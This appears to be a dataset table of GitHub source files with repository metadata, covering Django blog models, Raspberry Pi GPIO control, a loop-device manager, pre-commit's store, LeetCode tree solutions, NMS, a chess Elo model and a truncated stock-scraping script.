blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c233343317b5499b62792b2b9e631f43050868e6 | 90912d732e505c48c6770135f755a91c9ba2b1ef | /blog/models.py | 29e60772151dae9c76b6c04a92c8c2b84f6b2091 | [] | no_license | Shekharnunia/Puzzles | 2519a8a29a4c62176aab204835df40c10e01907b | 1abc6dcfda73c00222b8093ce2cd0cc7fc27d37c | refs/heads/master | 2022-12-16T03:04:42.626695 | 2020-02-12T07:36:49 | 2020-02-12T07:36:49 | 163,486,550 | 1 | 0 | null | 2022-12-08T01:30:24 | 2018-12-29T07:11:18 | CSS | UTF-8 | Python | false | false | 5,305 | py | import datetime
import readtime
from django.conf import settings
from django.db import models
from django.db.models import Count
from django.urls import reverse
from django.utils import timezone
from django.utils.html import mark_safe
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from markdown import markdown
from taggit.managers import TaggableManager
class ArticleQuerySet(models.query.QuerySet):
"""Personalized queryset created to improve model usability"""
def get_published(self):
"""Returns only the published items in the current queryset."""
return self.filter(status="P")
def get_drafts(self):
"""Returns only the items marked as DRAFT in the current queryset."""
return self.filter(status="D")
def get_5_popular_post(self):
"""Returns only the popular items as in the current queryset."""
return self.filter(status="P").order_by('-views')[:5]
def get_popular_post(self):
"""Returns only the popular items as in the current queryset."""
return self.filter(status="P").order_by('-views')
def get_counted_tags(self):
tag_dict = {}
query = self.filter(status='P').annotate(
tagged=Count('tags')).filter(tags__gt=0)
for obj in query:
for tag in obj.tags.names():
if tag not in tag_dict:
tag_dict[tag] = 1
else: # pragma: no cover
tag_dict[tag] += 1
return tag_dict.items()
class Category(models.Model):
"""Category model."""
title = models.CharField(_('title'), max_length=100)
slug = models.SlugField(_('slug'), unique=True)
summary = models.TextField(max_length=600)
thumbnail = models.ImageField(
('Category image'), upload_to='category/')
class Meta:
verbose_name = _('category')
verbose_name_plural = _('categories')
ordering = ('title',)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:category_detail', kwargs={'slug': self.slug})
def get_articles(self):
return Article.objects.filter(categories=self, status="P")
class Article(models.Model):
DRAFT = "D"
PUBLISHED = "P"
STATUS = (
(DRAFT, ("Draft")),
(PUBLISHED, ("Published")),
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL, null=True, related_name="author",
on_delete=models.SET_NULL)
thumbnail = models.ImageField(
('thumbnail image'), upload_to='articles_pictures/%Y/%m/%d/')
timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)
title = models.CharField(max_length=255, null=False, unique=True)
slug = models.SlugField(max_length=80, null=True, blank=True)
status = models.CharField(max_length=1, choices=STATUS, default=DRAFT)
content = models.TextField()
edited = models.BooleanField(default=False)
tags = TaggableManager()
updated_date = models.DateTimeField(auto_now=True, auto_now_add=False)
categories = models.ForeignKey(Category, on_delete=models.CASCADE)
views = models.PositiveIntegerField(default=0)
likes = models.ManyToManyField(settings.AUTH_USER_MODEL, blank=True, related_name='likes')
allow_comments = models.BooleanField(default=True)
show_comments_publically = models.BooleanField(default=True)
objects = ArticleQuerySet.as_manager()
class Meta:
verbose_name = ("Article")
verbose_name_plural = ("Articles")
ordering = ("-timestamp",)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:article', kwargs={
'year': self.timestamp.year,
'month': self.timestamp.strftime("%m"),
'day': self.timestamp.strftime("%d"),
'slug': self.slug
})
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.title)
super(Article, self).save(*args, **kwargs)
def delete(self, *args, **kwargs):
self.thumbnail.delete()
super().delete(*args, **kwargs)
def get_message_as_markdown(self):
return mark_safe(markdown(self.content, safe_mode='escape'))
def get_summary(self):
if len(self.get_message_as_markdown()) > 255:
return '{0}...'.format(self.get_message_as_markdown()[:255])
else:
return self.get_message_as_markdown()
def get_comments(self):
return ArticleComment.objects.filter(article=self)
def get_readtime(self):
return readtime.of_html(self.content)
def get_like_url(self):
return reverse("blog:like-toggle", kwargs={"pk": self.pk})
class ArticleComment(models.Model):
article = models.ForeignKey(Article, on_delete=models.CASCADE)
comment = models.CharField(max_length=500)
date = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
class Meta:
verbose_name = ("Article Comment")
verbose_name_plural = ("Article Comments")
ordering = ("date",)
def __str__(self):
return '{0} - {1}'.format(self.user.username, self.article.title)
| [
"shekharnunia@gmail.com"
] | shekharnunia@gmail.com |
3d93c548eb7596c43c950ee17dbb35b7a4998d7a | a43cf3cacf518096737dd39833fd39624f8cf543 | /antevents/adapters/rpi/gpio.py | 17ca2d5f184b6bec44511cf333135b0c5cbe265b | [
"Apache-2.0"
] | permissive | Mickey1964/antevents-python | f6ad4f9b056550055a223f7d4a7d34bc030c1dfb | 5b9226813583141986014fc83f6f74342a5f271e | refs/heads/master | 2021-06-15T11:23:56.253643 | 2017-03-31T05:25:59 | 2017-03-31T05:25:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | # Copyright 2016 by MPI-SWS and Data-Ken Research.
# Licensed under the Apache 2.0 License.
"""
Output on raspberry pi gpio pins
"""
import RPi.GPIO as gpio
from antevents.base import DefaultSubscriber, SensorEvent
class GpioPinOut(DefaultSubscriber):
"""Actuator for an output pin on the GPIO bus.
"""
def __init__(self, port=11):
self.port = port
gpio.setmode(gpio.BOARD)
gpio.setup(port, gpio.OUT, initial=gpio.LOW)
self.current_state = False
self.closed = False
def on_next(self, x):
"""If x is a truthy value, we turn the light on
"""
assert not isinstance(x, SensorEvent), "Send a raw value, not a sensor event"
if x and not self.current_state:
gpio.output(self.port, gpio.HIGH)
self.current_state = True
elif (not x) and self.current_state:
gpio.output(self.port, gpio.LOW)
self.current_state = False
def _cleanup(self):
if not self.closed:
gpio.output(self.port, gpio.LOW)
gpio.cleanup()
self.closed = True
def on_completed(self):
self._cleanup()
def on_error(self, e):
self._cleanup()
def __str__(self):
return "GpioPinOut(port=%s, state=%s)" % \
(self.port, 'ON' if self.current_state else 'OFF')
| [
"jeff@data-ken.org"
] | jeff@data-ken.org |
63ea6ada55f09f32ceb80db09b1c3ee6632dba40 | 7f20b1bddf9f48108a43a9922433b141fac66a6d | /csplugins/trunk/ucsd/rsaito/rs_Progs/rs_Python/rs_Python_Pack/trunk/General_Packages/Usefuls/Sort_AlphaNum.py | 40004e006eaae683fb078cce01219040fa0860dd | [] | no_license | ahdahddl/cytoscape | bf783d44cddda313a5b3563ea746b07f38173022 | a3df8f63dba4ec49942027c91ecac6efa920c195 | refs/heads/master | 2020-06-26T16:48:19.791722 | 2013-08-28T04:08:31 | 2013-08-28T04:08:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,397 | py | #!/usr/bin/env python
def split_alpha_num(istr):
""" '.' is dealt as string """
pctype = None
buf = []
buf_s = ""
for c in istr:
if '0' <= c and c <= '9':
ctype = "Num"
else:
ctype = "Char"
if pctype is not None and pctype != ctype:
if pctype == "Num":
buf.append(int(buf_s))
else:
buf.append(buf_s)
buf_s = ""
buf_s += c
pctype = ctype
if pctype == "Num":
buf.append(int(buf_s))
else:
buf.append(buf_s)
return buf
def add_zero_str(istr, zeronum = 5):
strnumlist = split_alpha_num(istr)
ret = ""
for elem in strnumlist:
if type(elem) is int:
if len('elem') > zeronum:
raise "Digits exceeded threshold"
ret += '0' * (zeronum - len(`elem`)) + `elem`
else:
ret += elem
return ret
def alphanum_sort_cmp(a, b):
a_ = add_zero_str(a)
b_ = add_zero_str(b)
if a_ < b_:
return -1
elif a_ == b_:
return 0
else:
return 1
if __name__ == "__main__":
print split_alpha_num("ABC10DEF05GH123CCC")
print add_zero_str("ABC10DEF05GH123CCC")
a = ["AB9", "AB8", "AB12", "AB11"]
a.sort(alphanum_sort_cmp)
print a
| [
"rsaito@0ecc0d97-ab19-0410-9704-bfe1a75892f5"
] | rsaito@0ecc0d97-ab19-0410-9704-bfe1a75892f5 |
24d6cbe734917d00e45ab475eae08d0fdf2d504e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_communicants.py | 93af30348381676802fd09037dc9cadc12e62484 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py |
#calss header
class _COMMUNICANTS():
def __init__(self,):
self.name = "COMMUNICANTS"
self.definitions = communicant
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['communicant']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
5ced18979b5583e2d8e88c8f467ea650badfe02f | 97c315e3349571c0d2a64129e09f106e4a5c4a57 | /thingosdci/loopdevmanager.py | b78b7089b3047f48f87fe96d3b92ed0258c301d9 | [] | no_license | ccrisan/thingosdci | d02b033fa7f5c765da95062d1bacbe0dbd634eb8 | 113dcb3811e214accec52dc10e69bb285c82c758 | refs/heads/master | 2022-12-11T19:59:34.119754 | 2022-12-10T09:01:31 | 2022-12-10T09:01:31 | 124,700,416 | 2 | 0 | null | 2019-05-19T09:27:03 | 2018-03-10T21:35:19 | Python | UTF-8 | Python | false | false | 1,665 | py |
import logging
import os
import stat
from thingosdci import settings
_LOOP_DEV_PATTERN = '/dev/loop{}'
_FILE_PERMS = 0o660
logger = logging.getLogger(__name__)
_loop_devs = {}
class LoopDevManagerException(Exception):
pass
def acquire_loop_dev():
for l, busy in _loop_devs.items():
if not busy:
loop_dev = _LOOP_DEV_PATTERN.format(l)
logger.debug('acquiring %s', loop_dev)
_loop_devs[l] = True
return loop_dev
raise LoopDevManagerException('no free loop device')
def release_loop_dev(loop_dev):
ld = loop_dev[9:]
try:
ld = int(ld)
except ValueError:
raise LoopDevManagerException('unknown loop device: {}'.format(loop_dev))
try:
busy = _loop_devs[ld]
except KeyError:
raise LoopDevManagerException('unknown loop device: {}'.format(loop_dev))
if not busy:
raise LoopDevManagerException('attempt to release free loop device: {}'.format(loop_dev))
logger.debug('releasing %s', loop_dev)
_loop_devs[ld] = False
def _ensure_loop_dev(loop_dev):
if os.path.exists(loop_dev):
return
try:
os.mknod(loop_dev, mode=stat.S_IFBLK | _FILE_PERMS)
except Exception as e:
logger.error('failed to create loop device: %s', e)
def init():
global _loop_devs
rng = range(settings.LOOP_DEV_RANGE[0], settings.LOOP_DEV_RANGE[1] + 1)
logger.debug('initializing loop devices (/dev/loop%s - /dev/loop%s)', *settings.LOOP_DEV_RANGE)
_loop_devs = {ld: False for ld in rng}
for ld in rng:
loop_dev = _LOOP_DEV_PATTERN.format(ld)
_ensure_loop_dev(loop_dev)
| [
"ccrisan@gmail.com"
] | ccrisan@gmail.com |
75b35268446c97fb27c10f58fdccad927f6d70d8 | 42fbb83d03cb8fff5b3a592ee67d599b9236b792 | /pre_commit/store.py | 30962576c345fcbab56be57d99e61bbd78900344 | [
"MIT"
] | permissive | dongweiming/pre-push | 09848e0e018608b3d35111ef93c0c9a5d65c7fbe | f96de6f260c2bc686937a1cc6bd2f6a7b807bc24 | refs/heads/master | 2021-01-16T18:32:32.539746 | 2015-01-15T02:13:10 | 2015-01-15T02:14:34 | 29,092,420 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,157 | py | from __future__ import unicode_literals
import io
import logging
import os
import os.path
import tempfile
from cached_property import cached_property
from pre_commit.prefixed_command_runner import PrefixedCommandRunner
from pre_commit.util import clean_path_on_failure
from pre_commit.util import cmd_output
from pre_commit.util import cwd
from pre_commit.util import hex_md5
logger = logging.getLogger('pre_commit')
def _get_default_directory():
"""Returns the default directory for the Store. This is intentionally
underscored to indicate that `Store.get_default_directory` is the intended
way to get this information. This is also done so
`Store.get_default_directory` can be mocked in tests and
`_get_default_directory` can be tested.
"""
return os.environ.get(
'PRE_COMMIT_HOME',
os.path.join(os.environ['HOME'], '.pre-commit'),
)
class Store(object):
get_default_directory = staticmethod(_get_default_directory)
class RepoPathGetter(object):
def __init__(self, repo, sha, store):
self._repo = repo
self._sha = sha
self._store = store
@cached_property
def repo_path(self):
return self._store.clone(self._repo, self._sha)
def __init__(self, directory=None):
if directory is None:
directory = self.get_default_directory()
self.directory = directory
self.__created = False
def _write_readme(self):
with io.open(os.path.join(self.directory, 'README'), 'w') as readme:
readme.write(
'This directory is maintained by the pre-commit project.\n'
'Learn more: https://github.com/pre-commit/pre-commit\n'
)
def _create(self):
if os.path.exists(self.directory):
return
os.makedirs(self.directory)
self._write_readme()
def require_created(self):
"""Require the pre-commit file store to be created."""
if self.__created:
return
self._create()
self.__created = True
def clone(self, url, sha):
"""Clone the given url and checkout the specific sha."""
self.require_created()
# Check if we already exist
sha_path = os.path.join(self.directory, sha + '_' + hex_md5(url))
if os.path.exists(sha_path):
return os.readlink(sha_path)
logger.info('Installing environment for {0}.'.format(url))
logger.info('Once installed this environment will be reused.')
logger.info('This may take a few minutes...')
dir = tempfile.mkdtemp(prefix='repo', dir=self.directory)
with clean_path_on_failure(dir):
cmd_output('git', 'clone', '--no-checkout', url, dir)
with cwd(dir):
cmd_output('git', 'checkout', sha)
# Make a symlink from sha->repo
os.symlink(dir, sha_path)
return dir
def get_repo_path_getter(self, repo, sha):
return self.RepoPathGetter(repo, sha, self)
@cached_property
def cmd_runner(self):
return PrefixedCommandRunner(self.directory)
| [
"asottile@umich.edu"
] | asottile@umich.edu |
d752a4dd9766b3d9a8fb4bccb75552c389297556 | 9703641c14b7c19f2fcf937150204ab85b4151a2 | /test/异常处理.py | efaa8de2df1f93c516c6ec7a3755958657b1b0b7 | [] | no_license | walkmiao/Little_Case | 8effbea554c930e0eb32d4335ecbd5541a9c1251 | ab445659e19c85ecfd9b99f8d615c33f900662f8 | refs/heads/master | 2021-06-11T05:30:39.415720 | 2019-05-14T10:37:29 | 2019-05-14T10:37:29 | 128,582,484 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : 异常处理.py
# @Author: lch
# @Date : 2018/8/20
# @Desc :
import logging
try:
fs = open('/fs')
except IOError:
logging.warn('dont exist this file')
print('this line will always print') | [
"372815340@qq.com"
] | 372815340@qq.com |
79655a9a52d6d6db2ff7bd9f857095dc3de5675a | 929fc8dd47b91c963c8c2f81d88e3d995a9dfc7c | /src/data_structure/tree/tree_to_graph.py | eece438f3adbe9bc881a645d250b7d4dcb2f9d73 | [] | no_license | 1325052669/leetcode | fe7571a9201f4ef54089c2e078810dad11205b14 | dca40686c6a280bd394feb8e6e78d40eecf854b9 | refs/heads/master | 2023-04-01T17:53:30.605822 | 2021-04-10T15:17:45 | 2021-04-10T15:17:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,284 | py | from collections import *
from typing import *
from src.data_structure.tree.model import TreeNode
# https://leetcode.com/problems/closest-leaf-in-a-binary-tree/
class Solution742:
def findClosestLeaf(self, root: TreeNode, k: int) -> int:
graph = defaultdict(set)
graph[root.val].add(float('inf')) # add a dummy to let alog know it is root
def dfs(node):
if node.left:
graph[node.val].add(node.left.val)
graph[node.left.val].add(node.val)
dfs(node.left)
if node.right:
graph[node.val].add(node.right.val)
graph[node.right.val].add(node.val)
dfs(node.right)
graph.setdefault(root.val, set()) # set default otherwise leaf will lose
dfs(root)
queue = list(node for node in graph if node and node == k)
seen = set(queue)
while queue:
node = queue.pop(0)
if len(graph[node]) <= 1 and node < float('inf'): # only from parent
return node
for neighbor in graph[node]:
if neighbor not in seen:
seen.add(neighbor)
queue.append(neighbor)
# https://leetcode.com/problems/all-nodes-distance-k-in-binary-tree/
class Solution863:
def distanceK(self, root: TreeNode, target: TreeNode, K: int) -> List[int]:
graph = defaultdict(set)
def dfs(node):
if not node: return
if node.left:
graph[node].add(node.left)
graph[node.left].add(node)
dfs(node.left)
if node.right:
graph[node].add(node.right)
graph[node.right].add(node)
dfs(node.right)
graph.setdefault(root, set())
dfs(root)
queue = [target]
seen = {target}
while queue:
size = len(queue)
if K == 0: return [x.val for x in queue]
for _ in range(size):
node = queue.pop(0)
for neighbor in graph[node]:
if neighbor not in seen:
seen.add(neighbor)
queue.append(neighbor)
K -= 1
return []
| [
"js7995@nyu.edu"
] | js7995@nyu.edu |
3ecdd27ac258743aef8dc07dc573d51dc7e5c1ae | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/detection/SOLOv2/mmdet/core/post_processing/bbox_nms.py | f5583b1a0ee6b7a050286cc535a3a6c090a8bb93 | [
"GPL-1.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 3,037 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
# from mmdet.ops.nms import nms_wrapper
def multiclass_nms(multi_bboxes,
multi_scores,
score_thr,
nms_cfg,
max_num=-1,
score_factors=None):
"""NMS for multi-class bboxes.
Args:
multi_bboxes (Tensor): shape (n, #class*4) or (n, 4)
multi_scores (Tensor): shape (n, #class), where the 0th column
contains scores of the background class, but this will be ignored.
score_thr (float): bbox threshold, bboxes with scores lower than it
will not be considered.
nms_thr (float): NMS IoU threshold
max_num (int): if there are more than max_num bboxes after NMS,
only top max_num will be kept.
score_factors (Tensor): The factors multiplied to scores before
applying NMS
Returns:
tuple: (bboxes, labels), tensors of shape (k, 5) and (k, 1). Labels
are 0-based.
"""
num_classes = multi_scores.shape[1]
bboxes, labels = [], []
nms_cfg_ = nms_cfg.copy()
nms_type = nms_cfg_.pop('type', 'nms')
nms_op = getattr(nms_wrapper, nms_type)
for i in range(1, num_classes):
cls_inds = multi_scores[:, i] > score_thr
if not cls_inds.any():
continue
# get bboxes and scores of this class
if multi_bboxes.shape[1] == 4:
_bboxes = multi_bboxes[cls_inds, :]
else:
_bboxes = multi_bboxes[cls_inds, i * 4:(i + 1) * 4]
_scores = multi_scores[cls_inds, i]
if score_factors is not None:
_scores *= score_factors[cls_inds]
cls_dets = torch.cat([_bboxes, _scores[:, None]], dim=1)
cls_dets, _ = nms_op(cls_dets, **nms_cfg_)
cls_labels = multi_bboxes.new_full((cls_dets.shape[0],),
i - 1,
dtype=torch.long)
bboxes.append(cls_dets)
labels.append(cls_labels)
if bboxes:
bboxes = torch.cat(bboxes)
labels = torch.cat(labels)
if bboxes.shape[0] > max_num:
_, inds = bboxes[:, -1].sort(descending=True)
inds = inds[:max_num]
bboxes = bboxes[inds]
labels = labels[inds]
else:
bboxes = multi_bboxes.new_zeros((0, 5))
labels = multi_bboxes.new_zeros((0,), dtype=torch.long)
return bboxes, labels
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
ee651e865294ada82101645f8a4cbc4692c15aa7 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5686275109552128_0/Python/Jozko/pancakes.py | add271c7fddf079fcf1bece68e7671120ebf59ba | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,273 | py | '''
Created on Apr 11, 2015
@author: jozefmokry
'''
import os, time, numpy
def read(path):
date = time.strftime('%d_%h_%H_%M_%S')
print date
with open(path, 'r') as f:
T = f.readline().strip()
T = int(T)
outPath = os.path.splitext(path)[0] + 'OUT.txt'
out = open(outPath, 'w')
for i in range(T):
line = f.readline().strip()
D = int(line)
plates = f.readline().strip().split(' ')
plates = map(int, plates)
assert D == len(plates), (D, len(plates))
ans = solve(plates)
out.write('Case #%d: %d\n' % (i+1, ans))
out.flush()
out.close()
print time.strftime('%d_%h_%H_%M_%S')
print 'DONE'
def solve(plates):
bestTime = numpy.inf
maxPlate = max(plates)
for i in range(1, maxPlate + 1):
cost = 0
for plate in plates:
#calculate cost if you want to split
#plate pancakes into piles of i pancakes
if plate > i:
cost += plate/i - 1
if plate % i != 0:
cost += 1
bestTime = min(bestTime, cost + i)
return bestTime
read('B-small-attempt0.in') | [
"eewestman@gmail.com"
] | eewestman@gmail.com |
d41a424ace518cfd736a345b91ef94780f1debad | f3416956f9bfc7af870867e2fe8644f08d513b23 | /combine/contest_20150211a/modeling/fit_gbr_pgmodel.py | 931fb8ea9c3a68861c7c9bb16e64402236e14968 | [] | no_license | dsjoerg/blundercheck | a71012c0d3ded929599d191d4f73dcb14f94030a | 04fb39ba0dd1591b387f573f767973518b688822 | refs/heads/master | 2021-01-18T18:35:21.992359 | 2015-03-24T18:11:11 | 2015-03-24T18:11:11 | 27,928,453 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,762 | py | #!/usr/bin/env python
import sys, time
import numpy as np
import cPickle as pickle
from pandas import DataFrame
from pandas import read_pickle
from pandas import get_dummies
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.cross_validation import cross_val_score
from sklearn.externals import joblib
from djeval import *
msg("Hi, reading yy_df.")
yy_df = read_pickle(sys.argv[1])
msg("Getting subset ready.")
# TODO save the dummies along with yy_df
dummies = get_dummies(yy_df['opening_feature'])
new_depth_cols = ['mean_num_bestmoves', 'mean_num_bestmove_changes', 'mean_bestmove_depths_agreeing', 'mean_deepest_change', 'mean_deepest_change_ratio']
train = yy_df[yy_df.meanerror.notnull() & yy_df.elo.notnull()]
features = ['nmerror',
'blunderrate', 'noblunders',
'perfectrate',
'gameoutcome',
'won_by_checkmate', 'lost_by_checkmate', 'ended_by_checkmate',
'my_final_equity', 'final_equity',
'grit', 'any_grit', 'opponent_any_grit', 'major_grit',
'mate_created', 'mate_destroyed', 'premature_quit',
'side',
'drawn_game',
'gamelength',
'meanecho',
'opponent_nmerror', 'opponent_noblunders',
'mean_depth_clipped',
'mean_seldepth',
'min_nmerror', 'max_nmerror', 'max_meanecho',
'early_lead',
'q_error_one', 'q_error_two',
'opponent_q_error_one', 'opponent_q_error_two',
'pct_sanemoves',
'opponent_blunderrate', 'opponent_perfectrate',
'opponent_grit', 'opponent_meanecho',
'opponent_mate_created', 'opponent_mate_destroyed',
'mean_seldepth',
'mean_depths_ar', 'mean_deepest_ar',
'opponent_mean_depths_ar', 'opponent_mean_deepest_ar',
'pct_sanemoves',
'moveelo_weighted'
]
features.extend(dummies)
features.extend(new_depth_cols)
# The raw movemodel wasnt helping us at all
use_moveelo_features = False
if use_moveelo_features:
moveelo_features = [("moveelo_" + x) for x in ['mean', 'median', '25', '10', 'min', 'max', 'stdev']]
features.extend(moveelo_features)
X = train[features].values
y = train['elo']
gbr = GradientBoostingRegressor(loss='lad', n_estimators=400, min_samples_leaf=10, min_samples_split=50)
msg("CROSS VALIDATING")
cvs = cross_val_score(gbr, X, y, cv=3, n_jobs=-1, scoring='mean_absolute_error')
print cvs
sys.stdout.flush()
msg("Fitting!")
gbr.fit(X, y)
msg("Saving model")
joblib.dump([gbr, features], sys.argv[2])
msg("Making predictions for all playergames")
yy_df['gbr_prediction'] = gbr.predict(yy_df[features].values)
yy_df['gbr_error'] = (yy_df['gbr_prediction'] - yy_df['elo']).abs()
yy_df['training'] = yy_df['elo'].notnull()
insample_scores = yy_df.groupby('training')['gbr_error'].agg({'mean' : np.mean, 'median' : np.median, 'stdev': np.std})
print insample_scores
msg("Writing yy_df back out with gbr predictions inside")
yy_df.to_pickle(sys.argv[1])
msg("Preparing Kaggle submission")
# map from eventnum to whiteelo,blackelo array
predictions = {}
for eventnum in np.arange(25001,50001):
predictions[eventnum] = [0,0]
for row in yy_df[yy_df['elo'].isnull()][['gamenum', 'side', 'gbr_prediction']].values:
eventnum = row[0]
side = row[1]
if side == 1:
sideindex = 0
else:
sideindex = 1
prediction = row[2]
predictions[eventnum][sideindex] = prediction
submission = open('/data/submission.csv', 'w')
submission.write('Event,WhiteElo,BlackElo\n')
for eventnum in np.arange(25001,50001):
submission.write('%i,%i,%i\n' % (eventnum, predictions[eventnum][0], predictions[eventnum][1]))
submission.close()
| [
"dsjoerg@gmail.com"
] | dsjoerg@gmail.com |
68a07449d40c47f739fa3ba0bde88af21dde1d6e | 9e549ee54faa8b037f90eac8ecb36f853e460e5e | /venv/lib/python3.6/site-packages/pylint/test/functional/assert_on_tuple.py | 3d36f93af03659192a8dc7f06926aacecad05888 | [
"MIT"
] | permissive | aitoehigie/britecore_flask | e8df68e71dd0eac980a7de8c0f20b5a5a16979fe | eef1873dbe6b2cc21f770bc6dec783007ae4493b | refs/heads/master | 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 | MIT | 2022-12-08T04:54:09 | 2019-03-24T00:38:20 | Python | UTF-8 | Python | false | false | 355 | py | """Assert check example"""
# pylint: disable=misplaced-comparison-constant, comparison-with-itself
assert (1 == 1, 2 == 2), "no error"
assert (1 == 1, 2 == 2) # [assert-on-tuple]
assert 1 == 1, "no error"
assert (1 == 1,), "no error"
assert (1 == 1,)
assert (1 == 1, 2 == 2, 3 == 5), "no error"
assert ()
assert (True, "error msg") # [assert-on-tuple]
| [
"aitoehigie@gmail.com"
] | aitoehigie@gmail.com |
4b807f39e2ab7747986e6e0610c0ebfd4ed8aec2 | 088276a2b02f74493c6303cbf17573957e1c2b3e | /NK/2_forecast_min.py | 4f926361198a20b970cc288858d0c68c2e49c406 | [] | no_license | naikiki87/python | 38f3ec9ed55b48df136708ad8e90e4358d536ca3 | 3c75cace24258c84b682e06033130ee627f7883c | refs/heads/master | 2023-06-05T09:49:51.931345 | 2021-06-30T04:35:41 | 2021-06-30T04:35:41 | 268,022,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,514 | py | import sys
import random
import time
import datetime
import sqlite3
import config
from PyQt5.QtCore import *
from PyQt5 import QtTest, QtCore, QtWidgets
import pandas as pd
import requests
import threading
from bs4 import BeautifulSoup
from time import localtime, strftime
STDEV_LIMIT = config.STDEV_LIMIT
MKT_SUM_LIMIT = 5000
VOL_AVERAGE = 100000
VOL_AVERAGE_LOW = 10000
VAL_PRICE_RATIO = 2
SUBS_CNT = 2000
SHOW_SCALE = 5
VOL_FIN_PAGE = 1 # 평균 volume을 구할 표본 수 -> 1 당 10일치
def run():
print(now(), "[FINDER] [run] START Item Discovering")
c_now = datetime.datetime.now()
c_year = c_now.strftime('%Y')
c_month = c_now.strftime('%m')
c_day = c_now.strftime('%d')
c_hour = c_now.strftime('%H')
c_min = c_now.strftime('%M')
c_sec = c_now.strftime('%S')
this_time = c_year + c_month + c_day + c_hour + c_min + c_sec
this_time = "20201216165322"
print(this_time, type(this_time))
code_df = pd.read_html('http://kind.krx.co.kr/corpgeneral/corpList.do?method=download&searchType=13', header=0)[0]
code_df.종목코드 = code_df.종목코드.map('{:06d}'.format)
code_df = code_df[['회사명', '종목코드']]
code_df = code_df.rename(columns={'회사명': 'name', '종목코드': 'code'})
df_last = pd.DataFrame(columns = ['code', 'ratio_min_max', 'mean_vol', 'stdev'])
df_vol = pd.DataFrame(columns = ['code', 'vol'])
cnt_code = len(code_df)
# for i in range(len(code_df)) :
for i in range(1) :
print(i)
try :
code = code_df.code[i]
print(code)
# url = 'http://finance.naver.com/item/sise_day.nhn?code={code}'.format(code=code)
url = 'https://finance.naver.com/item/sise_time.nhn?code={code}&thistime={thistime}&page=1'.format(code=code, thistime=thistime)
df = pd.read_html(url, header=0)[0]
print(df)
for page in range(2, VOL_FIN_PAGE + 1) :
